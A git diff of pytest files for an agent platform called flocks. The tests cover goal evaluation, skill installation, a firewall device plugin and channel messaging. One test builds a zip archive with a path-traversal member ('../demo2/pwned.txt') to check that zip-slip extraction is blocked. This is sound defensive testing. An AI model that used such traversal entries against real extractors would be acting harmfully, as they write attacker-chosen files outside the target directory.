+        ), patch(
+            "flocks.session.session_loop.Message.parts",
+            AsyncMock(return_value=[]),
+        ), patch(
+            "flocks.session.session_loop.Message.get_text_content",
+            MagicMock(return_value="Please clarify what tests to write."),
+        ), patch(
+            "flocks.session.session_loop.Message.create",
+            AsyncMock(),
+        ) as create_message, patch(
+            "flocks.session.session_loop.GoalManager.evaluate_after_turn",
+            AsyncMock(return_value=GoalDecision(
+                status="active",
+                verdict="waiting",
+                should_continue=False,
+                reason="waiting for user clarification",
+            )),
+        ), patch(
+            "flocks.session.runner.SessionRunner._process_step",
+            AsyncMock(return_value=StepResult(action="stop")),
+        ):
+            result = await SessionLoop._run_loop(ctx, callbacks)
+
+        assert result.action == "stop"
+        create_message.assert_not_awaited()
+        event_names = [call.args[0] for call in event_callback.await_args_list]
+        assert event_names == ["turn.started", "turn.stopped"]
+
+    @pytest.mark.asyncio
+    async def test_run_loop_passes_pending_question_to_goal_judge(self):
+        session = SimpleNamespace(
+            id="turn_goal_pending_question_session",
+            agent="rex",
+            directory="/tmp",
+            memory_enabled=False,
+        )
+        ctx = LoopContext(
+            session=session,
+            provider_id="test-provider",
+            model_id="test-model",
+            agent_name="rex",
+        )
+        user = self._make_msg("msg_001", "user")
+        assistant = self._make_msg("msg_002", "assistant", finish="stop")
+        ctx.session_ctx = SimpleNamespace(
+            get_messages=AsyncMock(side_effect=[
+                [user],
+                [user, assistant],
+            ])
+        )
+        event_callback = AsyncMock()
+        callbacks = LoopCallbacks(event_publish_callback=event_callback)
+        evaluate_goal = AsyncMock(return_value=GoalDecision(
+            status="active",
+            verdict="waiting",
+            should_continue=False,
+            reason="session has a pending user question",
+        ))
+
+        with patch(
+            "flocks.session.session_loop.Provider.resolve_model_info",
+            return_value=(0, 0, None),
+        ), patch(
+            "flocks.session.session_loop.Message.parts",
+            AsyncMock(return_value=[]),
+        ), patch(
+            "flocks.session.session_loop.Message.get_text_content",
+            MagicMock(return_value="Please provide the input."),
+        ), patch(
+            "flocks.server.routes.question.has_pending_questions",
+            MagicMock(return_value=True),
+        ), patch(
+            "flocks.session.session_loop.Message.create",
+            AsyncMock(),
+        ) as create_message, patch(
+            "flocks.session.session_loop.GoalManager.evaluate_after_turn",
+            evaluate_goal,
+        ), patch(
+            "flocks.session.runner.SessionRunner._process_step",
+            AsyncMock(return_value=StepResult(action="stop")),
+        ):
+            result = await SessionLoop._run_loop(ctx, callbacks)
+
+        assert result.action == "stop"
+        create_message.assert_not_awaited()
+        assert evaluate_goal.await_args.kwargs["pending_user_input"] is True
+        event_names = [call.args[0] for call in event_callback.await_args_list]
+        assert event_names == ["turn.started", "turn.stopped"]
+
+    @pytest.mark.asyncio
+    async def test_run_loop_publishes_goal_terminal_status(self):
+        session = SimpleNamespace(
+            id="turn_goal_done_session",
+            agent="rex",
+            directory="/tmp",
+            memory_enabled=False,
+        )
+        ctx = LoopContext(
+            session=session,
+            provider_id="test-provider",
+            model_id="test-model",
+            agent_name="rex",
+        )
+        messages = [
+            self._make_msg("msg_001", "user"),
+            self._make_msg("msg_002", "assistant", finish="stop"),
+        ]
+        ctx.session_ctx = SimpleNamespace(
+            get_messages=AsyncMock(side_effect=[[messages[0]], messages])
+        )
+        event_callback = AsyncMock()
+        callbacks = LoopCallbacks(event_publish_callback=event_callback)
+
+        with patch(
+            "flocks.session.session_loop.Provider.resolve_model_info",
+            return_value=(0, 0, None),
+        ), patch(
+            "flocks.session.session_loop.Message.parts",
+            AsyncMock(return_value=[]),
+        ), patch(
+            "flocks.session.session_loop.Message.get_text_content",
+            MagicMock(return_value="Goal complete: done"),
+        ), patch(
+            "flocks.session.session_loop.GoalManager.evaluate_after_turn",
+            AsyncMock(return_value=GoalDecision(
+                status="completed",
+                verdict="complete",
+                reason="Goal complete: done",
+                objective="finish work",
+            )),
+        ), patch(
+            "flocks.session.runner.SessionRunner._process_step",
+            AsyncMock(return_value=StepResult(action="stop")),
+        ):
+            result = await SessionLoop._run_loop(ctx, callbacks)
+
+        assert result.action == "stop"
+        event_names = [call.args[0] for call in event_callback.await_args_list]
+        assert event_names == ["turn.started", "session.goal.updated", "turn.stopped"]
+        goal_payload = event_callback.await_args_list[1].args[1]
+        assert goal_payload == {
+            "sessionID": session.id,
+            "status": "completed",
+            "objective": "finish work",
+            "reason": "Goal complete: done",
+        }
+
     @pytest.mark.asyncio
     async def test_pre_compact_cleanup_emits_turn_continued_before_next_iteration(self):
         session = SimpleNamespace(
diff --git a/tests/skill/test_installer.py b/tests/skill/test_installer.py
index d8f7a87e5..1420745e3 100644
--- a/tests/skill/test_installer.py
+++ b/tests/skill/test_installer.py
@@ -2,9 +2,12 @@
 Tests for flocks.skill.installer and eligibility checking.
 """
 
+import asyncio
 import os
 import shutil
 import tempfile
+import io
+import zipfile
 from pathlib import Path
 from unittest.mock import AsyncMock, MagicMock, patch
 
@@ -311,6 +314,37 @@ async def fake_create_subprocess_exec(*_cmd, **kwargs):
         assert result.skill_name == "demo"
         assert (tmp_skills_dir / "demo" / "SKILL.md").exists()
 
+    @pytest.mark.asyncio
+    async def test_skills_sh_cli_timeout_returns_error(self):
+        with (
+            patch("flocks.skill.installer.shutil.which", return_value="/usr/bin/npx"),
+            patch.object(
+                SkillInstaller,
+                "_run_subprocess",
+                AsyncMock(side_effect=TimeoutError("Command timed out after 45s")),
+            ),
+        ):
+            result = await SkillInstaller._install_from_skills_sh_cli(
+                "owner/repo/demo",
+                "global",
+                yes=True,
+            )
+
+        assert result.success is False
+        assert "timed out" in (result.error or "").lower()
+
+    @pytest.mark.asyncio
+    async def test_install_from_source_overall_timeout_returns_error(self):
+        async def fake_wait_for(awaitable, timeout):
+            awaitable.close()
+            raise asyncio.TimeoutError()
+
+        with patch("flocks.skill.installer.asyncio.wait_for", fake_wait_for):
+            result = await SkillInstaller.install_from_source("github:owner/repo/demo")
+
+        assert result.success is False
+        assert "timed out" in (result.error or "").lower()
+
     @pytest.mark.asyncio
     async def test_safeskill_requires_npx(self, tmp_skills_dir):
         with patch("flocks.skill.installer.shutil.which", return_value=None):
@@ -435,6 +469,110 @@ async def get(self, url: str):
         assert "raw GitHub SKILL.md fallback" in result.message
         assert (tmp_skills_dir / "web-design-guidelines" / "SKILL.md").exists()
 
+    @pytest.mark.asyncio
+    async def test_github_archive_fallback_finds_skill_by_name(self, tmp_skills_dir: Path):
+        skill_content = (
+            "---\n"
+            "name: improve-codebase-architecture\n"
+            "description: Improve codebase architecture\n"
+            "---\n"
+            "# Improve Codebase Architecture\n"
+        )
+        zip_buffer = io.BytesIO()
+        with zipfile.ZipFile(zip_buffer, "w") as zf:
+            zf.writestr(
+                "skills-main/skills/engineering/improve-codebase-architecture/SKILL.md",
+                skill_content,
+            )
+            zf.writestr(
+                "skills-main/skills/engineering/improve-codebase-architecture/references/checklist.md",
+                "checklist",
+            )
+
+        class Resp:
+            def __init__(self, status_code: int, text: str = "", content: bytes = b""):
+                self.status_code = status_code
+                self.text = text
+                self.content = content
+
+            def json(self):
+                return []
+
+        class Client:
+            async def __aenter__(self):
+                return self
+
+            async def __aexit__(self, *_args):
+                return None
+
+            async def get(self, url: str):
+                if "codeload.github.com" in url:
+                    return Resp(200, content=zip_buffer.getvalue())
+                return Resp(404, "not found")
+
+        with (
+            patch("flocks.skill.installer._user_skills_root", return_value=tmp_skills_dir),
+            patch("httpx.AsyncClient", return_value=Client()),
+        ):
+            result = await SkillInstaller.install_from_source(
+                "github:mattpocock/skills/improve-codebase-architecture"
+            )
+
+        assert result.success is True
+        assert result.skill_name == "improve-codebase-architecture"
+        assert "GitHub archive" in result.message
+        assert (
+            tmp_skills_dir
+            / "improve-codebase-architecture"
+            / "references"
+            / "checklist.md"
+        ).exists()
+
+    @pytest.mark.asyncio
+    async def test_github_archive_fallback_rejects_zip_slip_members(self, tmp_skills_dir: Path):
+        skill_content = (
+            "---\n"
+            "name: demo\n"
+            "description: Demo skill\n"
+            "---\n"
+            "# Demo\n"
+        )
+        zip_buffer = io.BytesIO()
+        with zipfile.ZipFile(zip_buffer, "w") as zf:
+            zf.writestr("repo-main/demo/SKILL.md", skill_content)
+            zf.writestr("repo-main/demo/../demo2/pwned.txt", "pwned")
+
+        class Resp:
+            def __init__(self, status_code: int, text: str = "", content: bytes = b""):
+                self.status_code = status_code
+                self.text = text
+                self.content = content
+
+            def json(self):
+                return []
+
+        class Client:
+            async def __aenter__(self):
+                return self
+
+            async def __aexit__(self, *_args):
+                return None
+
+            async def get(self, url: str):
+                if "codeload.github.com" in url:
+                    return Resp(200, content=zip_buffer.getvalue())
+                return Resp(404, "not found")
+
+        with (
+            patch("flocks.skill.installer._user_skills_root", return_value=tmp_skills_dir),
+            patch("httpx.AsyncClient", return_value=Client()),
+        ):
+            result = await SkillInstaller.install_from_source("github:owner/repo/demo")
+
+        assert result.success is True
+        assert (tmp_skills_dir / "demo" / "SKILL.md").exists()
+        assert not (tmp_skills_dir / "demo2" / "pwned.txt").exists()
+
 
 # ---------------------------------------------------------------------------
 # SkillInstaller._build_install_command
diff --git a/tests/skill/test_skill.py b/tests/skill/test_skill.py
index 58860c807..e704e785e 100644
--- a/tests/skill/test_skill.py
+++ b/tests/skill/test_skill.py
@@ -90,6 +90,26 @@ def test_parse_skill_with_frontmatter():
         assert skill_info.description == "Skill with frontmatter"
 
 
+def test_parse_skill_md_with_ui_hidden_flag(tmp_path):
+    """SKILL.md can opt out of user-facing skill UI with ui_hidden: true."""
+    skill_dir = tmp_path / "ui-hidden-skill"
+    skill_dir.mkdir()
+    skill_file = skill_dir / "SKILL.md"
+    skill_file.write_text("""---
+name: ui-hidden-skill
+description: UI-hidden internal skill
+ui_hidden: true
+---
+
+# UI Hidden Skill
+""")
+
+    skill_info = Skill._parse_skill_md(str(skill_file))
+
+    assert skill_info is not None
+    assert skill_info.ui_hidden is True
+
+
 @pytest.mark.asyncio
 async def test_discover_skills():
     """Test skill discovery"""
diff --git a/tests/skill/test_workflow_config_guide_skill.py b/tests/skill/test_workflow_config_guide_skill.py
new file mode 100644
index 000000000..46697a8cf
--- /dev/null
+++ b/tests/skill/test_workflow_config_guide_skill.py
@@ -0,0 +1,100 @@
+import json
+from pathlib import Path
+
+import pytest
+
+from flocks.skill.skill import Skill
+
+
+PROJECT_ROOT = Path(__file__).resolve().parents[2]
+
+
+def test_parse_workflow_config_guide_project_skill() -> None:
+    skill_file = (
+        PROJECT_ROOT
+        / ".flocks"
+        / "plugins"
+        / "skills"
+        / "workflow-config-guide"
+        / "SKILL.md"
+    )
+
+    parsed = Skill._parse_skill_md(str(skill_file))
+
+    assert parsed is not None
+    assert parsed.name == "workflow-config-guide"
+    assert parsed.category == "system"
+    assert parsed.ui_hidden is True
+    assert "配置现有 Flocks 工作流" in parsed.description
+
+
+def test_workflow_config_guide_requires_free_text_question_input() -> None:
+    skill_file = (
+        PROJECT_ROOT
+        / ".flocks"
+        / "plugins"
+        / "skills"
+        / "workflow-config-guide"
+        / "SKILL.md"
+    )
+
+    content = skill_file.read_text(encoding="utf-8")
+
+    assert "never make a configuration question choice-only" in content
+    assert 'type: "text"' in content
+    assert "Custom value or notes" in content
+
+
+def test_workflow_builder_references_template_inside_skill() -> None:
+    skill_file = (
+        PROJECT_ROOT
+        / ".flocks"
+        / "plugins"
+        / "skills"
+        / "workflow-builder"
+        / "SKILL.md"
+    )
+
+    content = skill_file.read_text(encoding="utf-8")
+
+    assert "references/workflow_template/" in content
+    assert ".flocks/plugins/workflows/workflow_template" not in content
+
+
+@pytest.mark.asyncio
+async def test_discover_workflow_config_guide_project_skill() -> None:
+    skills = await Skill.refresh()
+    skill_names = {skill.name for skill in skills}
+
+    assert "workflow-config-guide" in skill_names
+
+
+def test_workflow_template_no_longer_ships_integration_guide() -> None:
+    old_workflow_template = (
+        PROJECT_ROOT
+        / ".flocks"
+        / "plugins"
+        / "workflows"
+        / "workflow_template"
+    )
+    workflow_builder_template = (
+        PROJECT_ROOT
+        / ".flocks"
+        / "plugins"
+        / "skills"
+        / "workflow-builder"
+        / "references"
+        / "workflow_template"
+    )
+
+    assert not old_workflow_template.exists()
+    assert (workflow_builder_template / "workflow.md").exists()
+    assert (workflow_builder_template / "workflow.json").exists()
+    assert (workflow_builder_template / "config.json").exists()
+    assert (workflow_builder_template / "guide.md").exists()
+
+    config = json.loads((workflow_builder_template / "config.json").read_text(encoding="utf-8"))
+    assert config["kind"] == "workflow.integration-config"
+    assert isinstance(config["publish"], dict)
+    assert isinstance(config["triggers"], list)
+    assert "publishTemplates" not in config
diff --git a/tests/tool/test_360_fw_device_plugin.py b/tests/tool/test_360_fw_device_plugin.py
new file mode 100644
index 000000000..6892b273e
--- /dev/null
+++ b/tests/tool/test_360_fw_device_plugin.py
@@ -0,0 +1,307 @@
+from __future__ import annotations
+
+import importlib.util
+import shutil
+from pathlib import Path
+from types import SimpleNamespace
+from typing import Any
+
+import pytest
+import yaml
+
+from flocks.config.api_versioning import derive_storage_key
+from flocks.tool.registry import ToolContext, ToolResult
+from flocks.tool.tool_loader import yaml_to_tool
+
+
+_ROOT = Path(__file__).resolve().parents[2]
+_PLUGIN_DIR = _ROOT / ".flocks" / "flockshub" / "plugins" / "tools" / "device" / "360_fw_v5_5"
+_HANDLER_PATH = _PLUGIN_DIR / "360_fw.handler.py"
+
+
+def _installed_plugin_dir(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> Path:
+    project_root = tmp_path / "project"
+    install_dir = project_root / ".flocks" / "plugins" / "tools" / "device" / "360_fw_v5_5"
+    shutil.copytree(_PLUGIN_DIR, install_dir)
+    monkeypatch.chdir(project_root)
+    return install_dir
+
+
+def _load_handler():
+    spec = importlib.util.spec_from_file_location("_test_360_fw_handler", _HANDLER_PATH)
+    assert spec is not None
+    assert spec.loader is not None
+    module = importlib.util.module_from_spec(spec)
+    spec.loader.exec_module(module)
+    return module
+
+
+def test_provider_metadata_declares_360_fw_v5_5_device_plugin():
+    raw = yaml.safe_load((_PLUGIN_DIR / "_provider.yaml").read_text(encoding="utf-8"))
+
+    assert raw["name"] == "360_fw"
+    assert raw["service_id"] == "360_fw"
+    assert raw["version"] == "5.5"
+    assert raw["integration_type"] == "device"
+    assert raw["description_cn"]
+    assert derive_storage_key(raw["service_id"], raw["version"]) == "360_fw_v5_5"
+    assert raw["defaults"]["product_version"] == "5.5"
+    assert raw["defaults"]["fw_software_version"] == "V5.5"
+    assert raw["defaults"]["version_software"] == "V5.5R605P000B20240625"
+    assert "allow_mutation" not in raw["defaults"]
+    assert "allow_dangerous_ops" not in raw["defaults"]
+
+    credential_keys = {field["key"] for field in raw["credential_fields"]}
+    assert {"base_url", "username", "password"} <= credential_keys
+    secret_ids = {field.get("secret_id") for field in raw["credential_fields"]}
+    assert {"360_fw_v5_5_username", "360_fw_v5_5_password"} <= secret_ids
+
+
+def test_probe_manifest_declares_connectivity_and_fixtures():
+    raw = yaml.safe_load((_PLUGIN_DIR / "_test.yaml").read_text(encoding="utf-8"))
+
+    assert raw["connectivity"]["tool"] == "360_fw_system"
+    assert raw["connectivity"]["params"] == {"action": "fw_check_login"}
+
+    expected_tools = {
+        "360_fw_system",
+        "360_fw_objects",
+        "360_fw_policy",
+        "360_fw_network",
+        "360_fw_vpn_bgp",
+        "360_fw_auth_security",
+        "360_fw_observability",
+        "360_fw_api_readonly",
+        "360_fw_api_mutation",
+    }
+    for tool_name in expected_tools:
+        assert raw["fixtures"][tool_name], tool_name
+
+
+@pytest.mark.parametrize(
+    ("yaml_name", "function_name", "requires_confirmation"),
+    [
+        ("360_fw_system.yaml", "system", False),
+        ("360_fw_objects.yaml", "objects", True),
+        ("360_fw_policy.yaml", "policy", True),
+        ("360_fw_network.yaml", "network", True),
+        ("360_fw_vpn_bgp.yaml", "vpn_bgp", True),
+        ("360_fw_auth_security.yaml", "auth_security", True),
+        ("360_fw_observability.yaml", "observability", False),
+        ("360_fw_api_readonly.yaml", "api_readonly", False),
+        ("360_fw_api_mutation.yaml", "api_mutation", True),
+    ],
+)
+def test_group_manifest_loads_as_device_tool(
+    yaml_name: str,
+    function_name: str,
+    requires_confirmation: bool,
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+):
+    install_dir = _installed_plugin_dir(tmp_path, monkeypatch)
+    yaml_path = install_dir / yaml_name
+    raw = yaml.safe_load(yaml_path.read_text(encoding="utf-8"))
+    tool = yaml_to_tool(raw, yaml_path)
+
+    assert tool.info.provider == "360_fw_v5_5"
+    assert tool.info.source == "device"
+    assert tool.info.provider_version == "5.5"
+    assert raw["provider"] == "360_fw"
+    assert raw["handler"]["script_file"] == "360_fw.handler.py"
+    assert raw["handler"]["function"] == function_name
+    assert raw["requires_confirmation"] is requires_confirmation
+    assert "action" in raw["inputSchema"]["required"]
+    assert raw["inputSchema"]["properties"]["action"]["enum"]
+
+
+def test_runtime_config_resolves_configwriter_and_secret_refs(monkeypatch):
+    handler = _load_handler()
+    raw_service = {
+        "base_url": "https://fw.example.com/API/",
+        "username": "{secret:360_fw_v5_5_username}",
+        "password": "{secret:360_fw_v5_5_password}",
+        "timeout": "12",
+        "verify_ssl": "true",
+    }
+    secrets = {
+        "360_fw_v5_5_username": "admin",
+        "360_fw_v5_5_password": "pass",
+    }
+
+    monkeypatch.setattr(
+        handler.ConfigWriter,
+        "get_api_service_raw",
+        staticmethod(lambda service_id: raw_service if service_id == "360_fw" else None),
+    )
+    monkeypatch.setattr(handler, "get_secret_manager", lambda: SimpleNamespace(get=secrets.get))
+
+    config = handler._load_runtime_config()
+
+    assert config.base_url == "https://fw.example.com/API"
+    assert config.username == "admin"
+    assert config.password == "pass"
+    assert config.timeout == 12
+    assert config.verify_ssl is True
+
+
+def test_client_cache_key_does_not_store_plaintext_password():
+    handler = _load_handler()
+    config = handler.RuntimeConfig(
+        base_url="https://fw.example.com/API",
+        username="admin",
+        password="secret-password",
+        verify_ssl=False,
+        timeout=30,
+    )
+
+    key = handler._client_cache_key(config)
+
+    assert "secret-password" not in key
+    assert key == ("https://fw.example.com/API", "admin", False)
+
+
+def test_login_uses_user_pwd_and_raw_authorization_header():
+    handler = _load_handler()
+    config = handler.RuntimeConfig(
+        base_url="https://fw.example.com/API",
+        username="admin",
+        password="secret",
+        verify_ssl=False,
+        timeout=30,
+    )
+    client = handler.FwClient(config)
+    calls: list[tuple[str, str, dict[str, Any] | None, Any]] = []
+
+    class _Response:
+        status_code = 200
+        text = '{"result": true, "authorization": "raw-token"}'
+
+        def json(self):
+            return {"result": True, "authorization": "raw-token"}
+
+    def fake_request(method: str, url: str, **kwargs: Any):
+        calls.append((method, url, kwargs.get("json"), kwargs.get("headers")))
+        return _Response()
+
+    client.session.request = fake_request
+    result = client.login()
+
+    assert result == {"result": True, "authorization": "***"}
+    assert calls == [("POST", "https://fw.example.com/API/login", {"user": "admin", "pwd": "secret"}, None)]
+    assert client.session.headers["Authorization"] == "raw-token"
+    assert "Bearer" not in client.session.headers["Authorization"]
+
+
+@pytest.mark.parametrize(
+    ("method", "path"),
+    [
+        ("POST", "/save_config"),
+        ("POST", "/change_password"),
+        ("POST", "/config_clear_common"),
+        ("POST", "/restart"),
+        ("POST", "/restore"),
+        ("POST", "/library_upgrade"),
+        ("PUT", "/license_config"),
+        ("PUT", "/ha_config"),
+        ("PUT", "/global_domain_block_switch"),
+        ("DELETE", "/session_monitor"),
+        ("POST", "/bgp_clear_bgp_route"),
+        ("POST", "/user_obj"),
+        ("POST", "/signature_event"),
+    ],
+)
+def test_raw_mutation_rejects_high_risk_fw_device_state_changes(
+    monkeypatch, method: str, path: str
+):
+    handler = _load_handler()
+    monkeypatch.setattr(handler, "get_client", lambda: pytest.fail("blocked raw mutation must not call FW"))
+
+    with pytest.raises(handler.FwApiError, match="does not support high-risk FW operations"):
+        handler.fw_call_mutation({"method": method, "path": path, "body": "{}"})
+
+
+def test_api_catalog_contains_full_fw_surface_and_known_problem_metadata():
+    handler = _load_handler()
+
+    catalog = handler.fw_api_catalog({}).output
+
+    resources = catalog["documented_rest_api_resources"]
+    assert resources["/sys_info"] == ["GET"]
+    assert {"GET", "POST", "PUT", "DELETE"} <= set(resources["/addressobj"])
+    assert {"GET", "POST", "PUT", "DELETE"} <= set(resources["/fwpolicy"])
+    assert {"GET", "POST", "DELETE"} <= set(resources["/bgp_info"])
+    assert "/save_config" in catalog["blocked_high_risk_resources"]
+    assert catalog["known_problem_resources"]["/domainBlackList"]["GET"]["http_status"] == 404
+
+
+@pytest.mark.asyncio
+async def test_api_readonly_group_dispatches_to_fw_get(monkeypatch):
+    handler = _load_handler()
+    calls: list[tuple[str, dict[str, Any] | None]] = []
+
+    class _FakeClient:
+        def get(self, path: str, query: dict[str, Any] | None = None) -> dict[str, Any]:
+            calls.append((path, query))
+            return {"result": True, "data": {"host_name": "FW-1"}}
+
+    monkeypatch.setattr(handler, "get_client", lambda: _FakeClient())
+
+    result: ToolResult = await handler.api_readonly(
+        ToolContext(session_id="s", message_id="m"),
+        action="fw_call_raw_readonly",
+        path="/sys_info",
+    )
+
+    assert result.success is True
+    assert result.output == {"result": True, "data": {"host_name": "FW-1"}}
+    assert calls == [("/sys_info", None)]
+
+
+@pytest.mark.asyncio
+async def test_specialized_actions_build_expected_fw_payloads(monkeypatch):
+    handler = _load_handler()
+    calls: list[tuple[str, str, dict[str, Any] | None, Any]] = []
+
+    class _FakeClient:
+        def request(
+            self,
+            method: str,
+            path: str,
+            query: dict[str, Any] | None = None,
+            body: Any = None,
+        ) -> dict[str, Any]:
+            calls.append((method, path, query, body))
+            return {"result": True, "data": [{"id": 101, "name": body.get("name") if isinstance(body, dict) else None}]}
+
+    monkeypatch.setattr(handler, "get_client", lambda: _FakeClient())
+
+    ctx = ToolContext(session_id="s", message_id="m")
+    address = await handler.objects(
+        ctx,
+        action="fw_addressobj_create",
+        name="tmp_addr",
+        addr="198.18.0.10",
+        desc="temp",
+    )
+    service = await handler.objects(
+        ctx,
+        action="fw_serviceobj_create",
+        name="tmp_svc",
+        sev_str="TCP/1-65535:65000-65001",
+    )
+    route = await handler.network(
+        ctx,
+        action="fw_static_route_create",
+        dst_ip="198.51.100.252/32",
+        nh_ip="198.18.10.2",
+    )
+
+    assert address.success is True
+    assert service.success is True
+    assert route.success is True
+    assert calls == [
+        ("POST", "/addressobj", None, {"name": "tmp_addr", "type": 0, "desc": "temp", "item": [{"addr": "0:198.18.0.10"}]}),
+        ("POST", "/serviceobj", None, {"name": "tmp_svc", "desc": "", "item": [{"sev_str": "TCP/1-65535:65000-65001"}]}),
+        ("POST", "/static_route?protocol=1", None, {"ip_vrf_name": "default", "dst_ip": "198.51.100.252/32", "nh_type": "0", "nh_ip": "198.18.10.2", "oif": "", "weigh": "1", "distance": "255", "monitor_name": ""}),
+    ]
diff --git a/tests/tool/test_agent_toolset.py b/tests/tool/test_agent_toolset.py
index 4e0cb7a47..869b8daa0 100644
--- a/tests/tool/test_agent_toolset.py
+++ b/tests/tool/test_agent_toolset.py
@@ -98,6 +98,7 @@ def test_builtin_agent_yaml_tool_names_match_current_registry_surface() -> None:
         "edit",
         "glob",
         "grep",
+        "im_send_message",
         "lsp",
         "memory_search",
         "question",
diff --git a/tests/tool/test_builtin_management_tools.py b/tests/tool/test_builtin_management_tools.py
index 85c9fc240..b1a61d86d 100644
--- a/tests/tool/test_builtin_management_tools.py
+++ b/tests/tool/test_builtin_management_tools.py
@@ -30,6 +30,15 @@ def test_lsp_remains_non_native_by_default() -> None:
     assert tool.info.native is False
 
 
+def test_task_remains_non_native_when_declared() -> None:
+    ToolRegistry.init()
+
+    tool = ToolRegistry.get("task")
+
+    assert tool is not None
+    assert tool.info.native is False
+
+
 def test_model_config_tools_remain_non_native_by_default() -> None:
     ToolRegistry.init()
 
@@ -37,3 +46,12 @@ def test_model_config_tools_remain_non_native_by_default() -> None:
         tool = ToolRegistry.get(name)
         assert tool is not None
         assert tool.info.native is False
+
+
+def test_session_manage_remains_native_when_declared() -> None:
+    ToolRegistry.init()
+
+    tool = ToolRegistry.get("session_manage")
+
+    assert tool is not None
+    assert tool.info.native is True
diff --git a/tests/tool/test_channel_message.py b/tests/tool/test_channel_message.py
new file mode 100644
index 000000000..a7dc1355c
--- /dev/null
+++ b/tests/tool/test_channel_message.py
@@ -0,0 +1,85 @@
+from types import SimpleNamespace
+from unittest.mock import AsyncMock, patch
+
+import pytest
+
+from flocks.channel.base import DeliveryResult
+from flocks.tool.channel.channel_message import (
+    _normalize_channel_type,
+    channel_message,
+)
+from flocks.tool.registry import ToolContext, ToolRegistry
+
+
+def test_channel_message_normalizes_weixin_aliases() -> None:
+    assert _normalize_channel_type("weixin") == "weixin"
+    assert _normalize_channel_type("微信") == "weixin"
+    assert _normalize_channel_type("wechat") == "weixin"
+    assert _normalize_channel_type("wx") == "weixin"
+
+
+def test_channel_message_normalizes_wecom_aliases() -> None:
+    assert _normalize_channel_type("wecom") == "wecom"
+    assert _normalize_channel_type("企业微信") == "wecom"
+    assert _normalize_channel_type("企微") == "wecom"
+    assert _normalize_channel_type("wechat_work") == "wecom"
+    assert _normalize_channel_type("wxwork") == "wecom"
+
+
+def test_channel_message_schema_includes_weixin() -> None:
+    schema = ToolRegistry.get_schema("channel_message")
+
+    assert schema is not None
+    assert "wecom" in schema.properties["channel_type"]["enum"]
+    assert "企业微信" in schema.properties["channel_type"]["enum"]
+    assert "weixin" in schema.properties["channel_type"]["enum"]
+    assert "微信" in schema.properties["channel_type"]["enum"]
+
+
+@pytest.mark.asyncio
+async def test_channel_message_exact_binding_filters_selected_chat_only() -> None:
+    bindings = [
+        SimpleNamespace(
+            session_id="ses_shared",
+            channel_id="feishu",
+            account_id="acct_1",
+            chat_id="chat_1",
+        ),
+        SimpleNamespace(
+            session_id="ses_shared",
+            channel_id="feishu",
+            account_id="acct_2",
+            chat_id="chat_2",
+        ),
+    ]
+    svc = SimpleNamespace(list_bindings=AsyncMock(return_value=bindings))
+    deliver_result = DeliveryResult(
+        channel_id="feishu",
+        message_id="msg_2",
+        chat_id="chat_2",
+    )
+
+    with patch(
+        "flocks.tool.channel.channel_message._http_session_send",
+        AsyncMock(return_value=None),
+    ), patch(
+        "flocks.channel.inbound.session_binding.SessionBindingService",
+        return_value=svc,
+    ), patch(
+        "flocks.channel.outbound.deliver.OutboundDelivery.deliver",
+        AsyncMock(return_value=[deliver_result]),
+    ) as deliver:
+        result = await channel_message(
+            ToolContext(session_id="ses_current", message_id="msg_1"),
+            session_id="ses_shared",
+            message="hello",
+            channel_type="feishu",
+            account_id="acct_2",
+            chat_id="chat_2",
+        )
+
+    assert result.success is True
+    deliver.assert_awaited_once()
+    out_ctx = deliver.await_args.args[0]
+    assert out_ctx.account_id == "acct_2"
+    assert out_ctx.to == "chat_2"
diff --git a/tests/tool/test_credential_context_config_override.py b/tests/tool/test_credential_context_config_override.py
index 064c099b2..20c89e89e 100644
--- a/tests/tool/test_credential_context_config_override.py
+++ b/tests/tool/test_credential_context_config_override.py
@@ -16,6 +16,7 @@
     _config_override,
     _config_override_service,
     _config_override_storage_key,
+    activate_device_credentials,
     get_config_override,
 )
 
@@ -136,3 +137,43 @@ def test_identical_service_and_storage_key():
     )
     assert get_config_override("tdp_api") is _SAMPLE_CONFIG
     assert get_config_override("other") is None
+
+
+@pytest.mark.asyncio
+async def test_activate_preserves_legacy_fields_not_in_current_schema(monkeypatch):
+    """Old device rows can keep using fields removed from a newer schema."""
+
+    async def _fake_credentials(_device_id: str):
+        return {
+            "storage_key": "ngtip_api_v5_1_5",
+            "service_id": "ngtip_api",
+            "verify_ssl": False,
+            "fields": {
+                "apikey": "legacy-key",
+                "query_apikey": "query-key",
+            },
+        }
+
+    monkeypatch.setattr(
+        "flocks.tool.device.store.get_device_credentials",
+        _fake_credentials,
+    )
+    monkeypatch.setattr(
+        "flocks.tool.credential_context._load_credential_fields",
+        lambda _storage_key: [
+            {
+                "key": "query_apikey",
+                "storage": "secret",
+                "secret_id": "ngtip_query_apikey",
+                "config_key": "queryApiKey",
+            }
+        ],
+    )
+
+    async with activate_device_credentials("dev-a") as active:
+        assert active is True
+        config = get_config_override("ngtip_api_v5_1_5")
+
+    assert config is not None
+    assert config["queryApiKey"] == "{secret:ngtip_query_apikey}"
+    assert config["apikey"] == "legacy-key"
diff --git a/tests/tool/test_device_plugin_index.py b/tests/tool/test_device_plugin_index.py
index 05f68632d..1015d7afa 100644
--- a/tests/tool/test_device_plugin_index.py
+++ b/tests/tool/test_device_plugin_index.py
@@ -339,8 +339,8 @@ async def test_device_list_auto_creates_user_device_plugin_instance(monkeypatch,
     app.include_router(device_routes.router, prefix="/api/devices")
     client = TestClient(app)
 
-    response = client.get("/api/devices?refresh=true")
-    repeated = client.get("/api/devices?refresh=true")
+    response = client.post("/api/devices/sync?refresh=true")
+    repeated = client.post("/api/devices/sync?refresh=true")
     devices = await list_devices()
 
     assert response.status_code == 200
@@ -352,10 +352,12 @@ async def test_device_list_auto_creates_user_device_plugin_instance(monkeypatch,
     assert devices[0].enabled is True
 
     delete_response = client.delete(f"/api/devices/{devices[0].id}")
-    after_delete = client.get("/api/devices?refresh=true")
+    sync_after_delete = client.post("/api/devices/sync?refresh=true")
+    after_delete = client.get("/api/devices")
     devices_after_delete = await list_devices()
 
     assert delete_response.status_code == 204
+    assert sync_after_delete.status_code == 200
     assert after_delete.status_code == 200
     assert after_delete.json() == []
     assert devices_after_delete == []
@@ -369,7 +371,7 @@ async def test_device_list_auto_creates_user_device_plugin_instance(monkeypatch,
             "fields": {},
         },
     )
-    after_manual_create = client.get("/api/devices?refresh=true")
+    after_manual_create = client.get("/api/devices")
 
     assert manual_create.status_code == 201
     assert len(after_manual_create.json()) == 1
